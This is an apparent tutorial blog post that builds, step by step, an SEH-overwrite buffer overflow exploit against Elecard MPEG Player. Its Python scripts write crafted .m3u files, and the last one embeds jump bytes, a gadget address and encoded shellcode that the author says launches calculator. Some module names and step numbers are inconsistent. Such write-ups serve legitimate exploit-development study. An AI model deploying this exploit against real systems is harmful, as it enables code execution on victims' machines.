codename scx030c06c

Buffer Overflow : SEH based exploit on Elecard MPEG Player

in this post i will write my steps to exploit media player application (Elecard MPEG Player) with SEH protection, and here's the steps :

1. install application in windows XP machine

2. do the information gathering about supported filetype


3. From IG i got the information : the target support .m3u file and need a header

4. create the fuzzer file with python
file="seh.m3u"
junk="#EXTM3U\n"
junk+="\x41"*15000
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()

5. compile fuzzer to generate the m3u file

6. run target and load the m3u fuzzer


7. the target is crashed

8. now open the target with ollyDbg to to see what actually happened

9. run target and load the m3u fuzzer

10. the target is crashed. look at the top left box, the EBP and ESI is overwritten, but the EIP is not. it's because the SEH handle the crash


11. to see the SEH go to view > SEH chain. press shift+F9 to bypass the fuzzer to EIP



12. next step is create pattern with metasploit and insert into fuzzer script


13. run target from ollyDbg and load the m3u fuzzer

14. look the address in SEH chain and find the offset using metasploit



15. the offset is 8, that means need 8 byte to go to SEH

16. change the fuzzer script to measure the exact address of SEH
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*8
junk+="\xEF\xBE\xAD\xDE"
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()

17. okay, the SEH address is pwned.


18. next step is find the module that has POP POP RETN command but doesn't have SafeSEH protection

19. i will try to use esrcnet.dll module

20. now search sequence command of POP POP RETN in D3DIM7300 module


21. modify the fuzzer script
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4
junk+="\xeb\x06\x90\x90" #jump short
junk+="\xA6\xA0\x94\x73" #POP ESI address
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()

21. generate the payload with msfweb, in this case i use command call calculator


22. insert the payload into the fuzzer script and compile it
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4
junk+="\xeb\x06\x90\x90" #jump short
junk+="\xA6\xA0\x94\x73" 
junk+="\x90"*16
junk+=("\xbb\x10\xbf\xd7\x63\x29\xc9\xda\xc4\xd9\x74\x24\xf4\x5a\xb1\x23"
"\x31\x5a\x10\x83\xc2\x04\x03\x4a\xb3\x35\x96\x96\x23\xfd\x59\x66"
"\xb4\x75\x1c\x5a\x3f\xf5\x9a\xda\x3e\xe9\x2e\x55\x59\x7e\x6f\x49"
"\x58\x6b\xd9\x02\x6e\xe0\xdb\xfa\xbe\x36\x42\xae\x45\x76\x01\xa9"
"\x84\xbd\xe7\xb4\xc4\xa9\x0c\x8d\x9c\x09\xe9\x84\xf9\xd9\xae\x42"
"\x03\x35\x36\x01\x0f\x82\x3c\x4a\x0c\x15\xa8\xff\x30\x9e\x2f\x14"
"\xc1\xfc\x0b\xee\x11\xcd\x93\x8a\x1e\x6e\x24\xd7\xe1\x17\x48\x5c"
"\xa1\xeb\xdb\x12\x3e\x59\x50\xba\x36\x4a\x6e\xb1\xc7\x3c\x71\xc5"
"\xc7\xb7\x1a\xf9\x98\xf6\x2c\x61\x71\x70\x28\xe2\xbd\xf9\x99\x8c"
"\x43\x26\xfb\x3f\xd4\x4e\x02\x35\x2a\x38\x04\xae\x50\xa7\x96\x53"
"\x97")
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()

23. run the target without ollyDbg and insert the m3u fuzzer and see what happened



24. voila! the target is pwned!